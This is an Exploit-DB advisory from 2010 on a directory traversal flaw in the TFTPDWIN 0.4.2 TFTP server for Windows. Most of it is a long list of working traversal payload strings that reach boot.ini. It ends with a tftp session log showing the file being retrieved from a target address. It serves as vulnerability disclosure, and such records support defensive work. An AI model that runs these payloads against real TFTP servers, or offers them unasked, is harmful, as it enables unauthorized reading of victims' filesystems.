TFTPDWIN 0.4.2 - Directory Traversal

EDB-ID:

14856

CVE:

N/A

EDB Verified:

Author:

chr1x

Type:

remote

Exploit:   /  

Platform:

Windows

Date:

2010-09-01

Vulnerable App: 
+------------------------------------------------------------------------+
|                                 .......                                |
|                         ..''xxxxxxxxxxxxxxx'...                        |
|                    ..'xxxxxxxxxxxxxxxxxxxxxxxxxxx..                    |
|                 ..'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'.                 |
|               .'xxxxxxxxxxxxxxxxxxxxxxxxxxxx'''.......'.               |
|             .'xxxxxxxxxxxxxxxxxxxxx''......        ...  ..             |
|            .xxxxxxxxxxxxxxxxxx'...         ........      .'.           |
|           'xxxxxxxxxxxxxxx'......                          '.          |
|          'xxxxxxxxxxxxxx'..'x..                            .x.         |
|         .xxxxxxxxxxxx'...'..                  ...           .'         |
|         'xxxxxxxxx'..  .                          ..        .x.        |
|         xxxxxxx'.                                  ..        x.        |
|         xxxx'.                ....                  x        x.        |
|         'x'.            ...'xxxxxxx'.               x       .x.        |
|         .x'.         .'xxxxxxxxxxxxxx.             ''       .'         |
|          .xx.      .'xxxxxxxxxxxxxxxx.           .'xx'''.  .'          |
|           .xx..    'xxxxxxxxxxxxxxxx'          .'xxxxxxxxx''.          |
|            .'xx'.  .'xxxxxxxxxxxxxxx.      ..'xxxxxxxxxxxx'            |
|              .xxx'.  .xxxxxxxxxxxx'.    .'xxxxxxxxxxxxxx'.             |
|                .xxxx'.'xxxxxxxxx'.      xxx'xxxxxxxxxx'.               |
|                  .'xxxxxxx'....          ...xxxxxxx'.                  |
|                     ..'xxxxx'..         ..xxxxx'..                     |
|                          ....'xx'.....''''...                          |
|                                                                        |
|                    CubilFelino Security Research Labs                  |
|                            proudly presents...                         |
+------------------------------------------------------------------------+


Author: chr1x (chr1x@sectester.net)
Date: August 30, 2010
Affected operating system/software, including full version details
* TFTP Server TFTPDWIN v0.4.2, Tested on Windows XP PRO SP3

Download:
http://www.prosysinfo.webpark.pl/sciagnij.html
http://www.versiontracker.com/php/dlpage.php?id=10417389&db=win&pid=10417389&kind=&lnk=http://www.prosysinfo.com.pl/tftpserver/tftpdwin.exe

How the vulnerability can be reproduced

* Please, use the strings shown below to reproduce the issue.

[*] Testing Path: ../../../boot.ini <- Vulnerable string!!
[*] Testing Path: ../../boot.ini  <- Vulnerable string!!
[*] Testing Path: ../../../boot.ini  <- Vulnerable string!!
[*] Testing Path: ../../../../boot.ini  <- Vulnerable string!!
[*] Testing Path: ../../../../../boot.ini  <- Vulnerable string!!
[*] Testing Path: ../../../../../../boot.ini  <- Vulnerable string!!
[*] Testing Path: ../../../../../../../boot.ini  <- Vulnerable string!!
[*] Testing Path: ../../../../../../../../boot.ini  <- Vulnerable string!!
[*] Testing Path: ..\..\boot.ini  <- Vulnerable string!!
[*] Testing Path: ..\..\..\boot.ini  <- Vulnerable string!!
[*] Testing Path: ..\..\..\..\boot.ini  <- Vulnerable string!!
[*] Testing Path: ..\..\..\..\..\boot.ini  <- Vulnerable string!!
[*] Testing Path: ..\..\..\..\..\..\boot.ini  <- Vulnerable string!!
[*] Testing Path: ..\..\..\..\..\..\..\boot.ini  <- Vulnerable string!!
[*] Testing Path: ..\..\..\..\..\..\..\..\boot.ini  <- Vulnerable string!!
[*] Testing Path: ../../boot.ini <- Vulnerable string!!
[*] Testing Path: ../../../boot.ini <- Vulnerable string!!
[*] Testing Path: ../../../../boot.ini <- Vulnerable string!!
[*] Testing Path: ../../../../../boot.ini <- Vulnerable string!!
[*] Testing Path: ../../../../../../boot.ini <- Vulnerable string!!
[*] Testing Path: ../../../../../../../boot.ini <- Vulnerable string!!
[*] Testing Path: ../../../../../../../../boot.ini <- Vulnerable string!!
[*] Testing Path: ..\..\boot.ini <- Vulnerable string!!
[*] Testing Path: ..\..\..\boot.ini <- Vulnerable string!!
[*] Testing Path: ..\..\..\..\boot.ini <- Vulnerable string!!
[*] Testing Path: ..\..\..\..\..\boot.ini <- Vulnerable string!!
[*] Testing Path: ..\..\..\..\..\..\boot.ini <- Vulnerable string!!
[*] Testing Path: ..\..\..\..\..\..\..\boot.ini <- Vulnerable string!!
[*] Testing Path: ..\..\..\..\..\..\..\..\boot.ini <- Vulnerable string!!
[*] Testing Path: ../../boot.ini <- Vulnerable string!!
[*] Testing Path: ../../../boot.ini <- Vulnerable string!!
[*] Testing Path: ../../../../boot.ini <- Vulnerable string!!
[*] Testing Path: ../../../../../boot.ini <- Vulnerable string!!
[*] Testing Path: ../../../../../../boot.ini <- Vulnerable string!!
[*] Testing Path: ../../../../../../../boot.ini <- Vulnerable string!!
[*] Testing Path: ../../../../../../../../boot.ini <- Vulnerable string!!
[*] Testing Path: ..\..\boot.ini <- Vulnerable string!!
[*] Testing Path: ..\..\..\boot.ini <- Vulnerable string!!
[*] Testing Path: ..\..\..\..\boot.ini <- Vulnerable string!!
[*] Testing Path: ..\..\..\..\..\boot.ini <- Vulnerable string!!
[*] Testing Path: ..\..\..\..\..\..\boot.ini <- Vulnerable string!!
[*] Testing Path: ..\..\..\..\..\..\..\boot.ini <- Vulnerable string!!
[*] Testing Path: ..\..\..\..\..\..\..\..\boot.ini <- Vulnerable string!!
[*] Testing Path: \../boot.ini  <- Vulnerable string!!
[*] Testing Path: \../\../boot.ini  <- Vulnerable string!!
[*] Testing Path: \../\../\../boot.ini  <- Vulnerable string!!
[*] Testing Path: \../\../\../\../boot.ini  <- Vulnerable string!!
[*] Testing Path: \../\../\../\../\../boot.ini  <- Vulnerable string!!
[*] Testing Path: \../\../\../\../\../\../boot.ini  <- Vulnerable string!!
[*] Testing Path: \../\../\../\../\../\../\../boot.ini  <- Vulnerable string!!
[*] Testing Path: \../\../\../\../\../\../\../\../boot.ini  <- Vulnerable string!!
[*] Testing Path: /..\/..\boot.ini  <- Vulnerable string!!
[*] Testing Path: /..\/..\/..\boot.ini  <- Vulnerable string!!
[*] Testing Path: /..\/..\/..\/..\boot.ini  <- Vulnerable string!!
[*] Testing Path: /..\/..\/..\/..\/..\boot.ini  <- Vulnerable string!!
[*] Testing Path: /..\/..\/..\/..\/..\/..\boot.ini  <- Vulnerable string!!
[*] Testing Path: /..\/..\/..\/..\/..\/..\/..\boot.ini  <- Vulnerable string!!
[*] Testing Path: /..\/..\/..\/..\/..\/..\/..\/..\boot.ini  <- Vulnerable string!!

Confirmation Log:

root@olovely:/# tftp 192.168.1.53
tftp> connect
(to) 192.168.1.53
tftp> ascii
tftp> get
(files) ..\..\..\..\..\..\..\boot.ini
Received 211 bytes in 0.0 seconds
tftp>


What impact the vulnerability has on the vulnerable system
Any additional details that might help in the verification process

* High, since when exploiting the vulnerability the attacker is able to get full access to the victim filesystem.
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services